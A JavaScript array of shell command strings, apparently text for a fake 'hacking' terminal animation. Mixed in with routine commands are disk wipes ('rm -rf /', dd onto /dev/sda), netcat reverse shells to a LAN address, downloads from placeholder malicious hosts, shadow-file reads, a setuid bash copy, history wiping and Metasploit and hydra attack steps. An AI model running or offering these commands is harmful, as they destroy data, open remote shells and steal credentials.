const commands = [
  "sudo apt-get update",
  "sudo apt-get upgrade",
  "ping -c 4 google.com",
  "traceroute google.com",
  "whoami",
  "ls -la",
  "cd /var/log",
  "cat /etc/passwd",
  "chmod 777 /root",
  "echo \"Hacking in progress...\"",
  "nano /etc/hosts",
  "wget http://malicious-site.com/script.sh",
  "curl -O https://darkweb.com/hacktool.zip",
  "scp user@192.168.1.1:/home/files /local/path",
  "ssh root@192.168.1.1",
  "rm -rf /",
  "python3 exploit.py",
  "chmod +x backdoor.sh",
  "./backdoor.sh",
  "iptables -L",
  "netstat -an",
  "ps aux | grep root",
  "kill -9 1234",
  "history -c",
  "crontab -e",
  "systemctl restart networking",
  "service apache2 restart",
  "grep \"password\" /var/log/auth.log",
  "find / -name \"secret.txt\"",
  "dd if=/dev/random of=/dev/sda",
  "tcpdump -i eth0",
  "nmap -sS 192.168.1.0/24",
  "hydra -l admin -P passwords.txt 192.168.1.1 ssh",
  "john --wordlist=rockyou.txt hash.txt",
  "airmon-ng start wlan0",
  "airodump-ng wlan0mon",
  "aircrack-ng -b BSSID -w wordlist.txt",
  "msfconsole",
  "use exploit/unix/ftp/vsftpd_234_backdoor",
  "set RHOST 192.168.1.1",
  "exploit",
  "nc -lvnp 4444",
  "echo \"Malware uploaded\" > /dev/null",
  "uname -a",
  "df -h",
  "free -m",
  "ip a",
  "ifconfig eth0 up",
  "iwconfig wlan0 mode monitor",
  "htop",
  "top",
  "cat /etc/shadow",
  "cp /bin/bash /tmp/rootbash",
  "chmod +s /tmp/rootbash",
  "/tmp/rootbash",
  "watch -n 1 \"ps aux | grep ssh\"",
  "echo \"01101100 01101111 01101100\"",
  "openssl enc -aes-256-cbc -in secret.txt -out secret.enc",
  "openssl rand -base64 32",
  "hexdump -C secret.txt",
  "strings malware.exe",
  "binwalk -e firmware.bin",
  "disown -h",
  "bg",
  "fg",
  "alias ls=\"echo 'You are hacked!'\"",
  "export PATH=\"/tmp/malware:PATH\"",
  "unset HISTFILE",
  "rmdir /important_data",
  "chown root:root /etc/passwd",
  "dpkg -i trojan.deb",
  "rpm -i rootkit.rpm",
  "perl -e 'print \"A\"x1000'",
  "gcc exploit.c -o exploit",
  "./exploit",
  "python3 -m http.server 8080",
  "socat TCP-LISTEN:4444 EXEC:/bin/sh",
  "nc -e /bin/sh 192.168.1.2 4444",
  "touch /tmp/.hidden",
  "mv /bin/bash /bin/notbash",
  "ln -s /dev/null ~/.bash_history",
  "export TERM=vt100",
  "mkfifo /tmp/f",
  "cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 4444 > /tmp/f",
  "chattr +i /etc/passwd",
  "usermod -aG sudo hacker",
  "echo \"127.0.0.1 facebook.com\" >> /etc/hosts",
  "echo \"Hacked by anonymous\" > /dev/tty1",
  "cat /dev/random > /dev/audio",
  "pv secret.iso | dd of=/dev/sdb",
  "nc -zv 192.168.1.1 22-100",
  "poweroff",
  "reboot",
  "exit",
];
